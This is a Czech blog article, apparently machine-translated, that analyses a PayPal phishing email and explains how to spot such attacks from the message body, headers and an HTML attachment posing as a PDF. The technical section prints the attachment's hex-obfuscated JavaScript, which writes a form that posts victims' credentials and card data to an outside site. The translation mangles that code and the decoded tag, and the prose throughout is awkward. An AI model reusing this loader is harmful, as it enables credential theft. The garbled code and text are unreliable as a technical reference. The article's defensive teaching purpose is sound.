10Sep
V dnešním světě, kde jsou všechny informace online, je phishing jedním z nejoblíbenějších a ničivějších on-line útoků, protože vždy můžete vyčistit virus, ale pokud jsou vaše bankovní údaje ukradeny, máte potíže. Zde je rozbor jednoho takového útoku, který jsme obdrželi.
Nemyslete si, že jsou to jen vaše bankovní údaje, které jsou důležité: Koneckonců, pokud někdo získá kontrolu nad přihlášením k účtu, neví jen informace obsažené v tomto účtu, ale šance jsou, že stejné přihlašovací údaje mohou být použity na různýchostatní účty. A pokud kompromitují váš e-mailový účet, mohou resetovat všechna vaše další hesla.
Takže kromě zachování silných a měnících se hesel musíte vždy hledat falešné e-maily, které se skládají za skutečnou věc. Zatímco většina pokusů o phishing je amatérská, některé jsou docela přesvědčivé, takže je důležité pochopit, jak je rozpoznat na povrchové úrovni, a jak pracují pod kapucí.
Image by asirap
Zkouška Co je v prostém vidění
Náš příklad e-mailu, jako většina pokusů o phishing, vás "upozorňuje" na aktivitu vašeho účtu PayPal, který by za normálních okolností byl alarmující.Takže výzva k akci je ověřit / obnovit svůj účet tím, že odešlete téměř všechny osobní informace, o kterých si myslíte. Opět je to docela formální.
Zatímco jistě existují výjimky, téměř všechny phishingové a podvodné emaily jsou načteny červenými vlajkami přímo ve zprávě samotné.Dokonce i když je text přesvědčivý, můžete obvykle nalézt mnoho chyb pokrytých celým tělem zprávy, které naznačují, že zpráva není legitimní.
Tělo zprávy
Na první pohled je to jeden z lepších e-mailů s phishingem, které jsem viděl. Neexistují žádné pravopisné nebo gramatické chyby a verbiage čte podle toho, co byste čekali. Existuje však několik červených vlajek, které můžete vidět při podrobnějším přezkoumání obsahu.
- "Paypal" - Správný případ je "PayPal"( kapitál P).Ve zprávě můžete vidět oba varianty. Firmy jsou velmi záměrné se svou značkou, takže je pochybné, že by něco takového prošlo procesem kontroly.
- "povolit ActiveX" - kolikrát jste viděli legit webovou firmu velikosti Paypal používat proprietární součást, která funguje pouze na jediném prohlížeči, zejména když podporují více prohlížečů?Jistě, někde venku to dělá nějaká společnost, ale je to červená vlajka.
- "bezpečně". - Všimněte si, jak toto slovo není zarovnáno na okraji se zbytkem textu odstavce. Dokonce i když jsem trochu roztažil okno, nezakrývá se správně.
- "Paypal!" - Místo před vykřičníkem vypadá nepříjemně.Jen další kýpnutí, které jsem si jist, že nebude v legitímném e-mailu.
- "PayPal - Formulář pro aktualizaci účtu.pdf.htm" - Proč by Paypal připojil "PDF", zvláště když by mohli jen odkazovat na stránku na svých stránkách? Navíc proč by se pokoušeli zakrýt soubor HTML jako PDF?To je největší červená vlajka všech.
Hlavička zpráv
Když se podíváte na hlavičku zprávy, objeví se pár dalších červených příznaků:
- Adresa je [email protected].
- Chybí adresa. Nevyprávěl jsem to, prostě není součástí standardního záhlaví zprávy. Obvykle společnost, která má vaše jméno, vám přizpůsobí e-mail.
Příloha
Když otevře přílohu, můžete okamžitě vidět, že rozložení není správné, protože chybí informace o stylu. Opět platí, proč by PayPal poslal e-mailem formulář HTML, kdyby mohli jednoduše poskytnout odkaz na svých stránkách?
Poznámka: jsme pro tento účel použili prohlížeč Gmail pro vkládání příloh, doporučujeme však, aby jste neopouštěli přílohy od podvodníků.Nikdy. Vůbec. Velmi často obsahují exploity, které na vašem PC nainstalují trojské koně a ukradnou informace o vašem účtu.
O něco daleko víc můžete vidět, že se tento formulář dotazuje nejen na naše přihlašovací údaje PayPal, ale i na bankovní a kreditní karty. Některé snímky jsou přerušeny.
Je zřejmé, že tento pokus o phishing jde po všem s jedním výkyvem.
Technické rozdělení
Zatímco by mělo být docela jasné na základě toho, co je zřejmé, že se jedná o pokus o phishing, nyní rozložíme technickou strukturu e-mailu a zjistíme, co najdeme.
Informace z přílohy
První věc, na kterou se podíváte, je zdroj HTML formu přílohy, který předkládá data podvodnému webu.
Při rychlém prohlížení zdroje jsou všechny odkazy platné, neboť odkazují na "paypal.com" nebo "paypalobjects.com", které jsou oba legit.
Nyní se podíváme na některé základní informace, které Firefox shromažďuje na stránce.
Jak vidíte, některé grafiky jsou vytaženy z domén "blessedtobe.com", "goodhealthpharmacy.com" a "pic-upload.de" namísto legitních domén PayPal.
Informace z záhlaví e-mailu
Dále se podíváme na hlavičky neupravené e-mailové zprávy. Služba Gmail je tato možnost dostupná prostřednictvím možnosti nabídky Zobrazit originál ve zprávě.
Při pohledu na informace o hlavičce pro původní zprávu můžete vidět, že tato zpráva byla složena pomocí aplikace Outlook Express 6. Pochybuji, že PayPal má někoho v personálu, který posílá každou z těchto zpráv ručně prostřednictvím zastaralého e-mailového klienta.
Při pohledu na informace o směrování můžeme vidět adresu IP odesílatele i serveru pro přenos pošty.
Adresa IP uživatele je původní odesílatel. S rychlým vyhledáváním informací IP, vidíme, že vysílací IP je v Německu.
A když se podíváme na adresu odesílajícího poštovního serveru( mail.itak.at), IP adresu vidíme, že se jedná o poskytovatele služeb založeného v Rakousku. Pochybuji, že PayPal směruje své e-maily přímo prostřednictvím poskytovatele ISP v Rakousku, když mají masivní serverovou farmu, která by mohla tuto úlohu snadno zvládnout.
Kde jde data?
Takže jsme jasně zjistili, že jde o phishingovou e-mailovou zprávu a shromáždili nějaké informace o tom, odkud pocházejí zprávy, ale co je místo, kde jsou vaše data odeslána?
Chcete-li to vidět, musíte nejprve uložit přílohu HTM do pracovní plochy a otevřít v textovém editoru. Při procházení se zdá, že všechno je v pořádku, s výjimkou případů, kdy se dostaneme k podezřelému bloku Javascript.
Vypnutí úplného zdroje posledního bloku jazyka Javascript, vidíme:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =“3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e“; y =“; pro( i = 0; i-x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;
Kdykoli uvidíte rozsáhlý řetězec zdánlivě náhodných písmen a čísel vložených do bloku Javascript, je to obvykle něco podezřelého. Při pohledu na kód je proměnná "x" nastavena na tento velký řetězec a pak dekódována do proměnné "y".Výsledný výsledek proměnné "y" je pak do dokumentu zapsán jako HTML.
Protože velké větvi je z čísel 0-9 a písmena AF, je s největší pravděpodobností zakódován pomocí jednoduchého ASCII ke konverzi Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
překládá:
& lt; název forma =“hlavní“ id =“hlavní“method = "post" akce = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
Není náhoda, že to dekóduje do platného tagu formátu HTML, který výsledky neposílá do PayPal, ale do nepoctivého webu.
Navíc při zobrazení zdrojového kódu HTML formuláře uvidíte, že tato značka formuláře není viditelná, protože je generována dynamicky pomocí javascriptu. Je to chytrý způsob, jak skrýt to, co HTML skutečně dělá, pokud někdo jednoduše prohlédne generovaný zdroj přílohy( jak jsme to dělali dříve), na rozdíl od otevření přílohy přímo v textovém editoru.
Při běhu rychlého whois na útočné stránce vidíme, že to je doména hostovaná na populárním webovém hostiteli, 1and1.
Co vyniká, doména používá čitelný název( na rozdíl od něčeho jako "dfh3sjhskjhw.net") a doména byla zaregistrována po dobu 4 let. Z tohoto důvodu jsem přesvědčen, že tato doména byla v tomto pokusu o phishingu unesena a použita jako pěšec.
Cynicismus je dobrá obrana
Pokud jde o to, že zůstaneme v bezpečí on-line, nikdy to neublíží, že bude mít dobrý cynismus.
Zatímco jsem si jist, že v příkladovém e-mailu jsou více červených vlajek, ukazují to, co jsme viděli po několika minutách zkoumání.Hypotheticky, pokud by úroveň povrchu e-mailu napodobovala svůj legitimní protějšek 100%, technická analýza by stále odhalila jeho pravou povahu. To je důvod, proč je důležité, abyste mohli zkoumat to, co můžete a nemůžete vidět.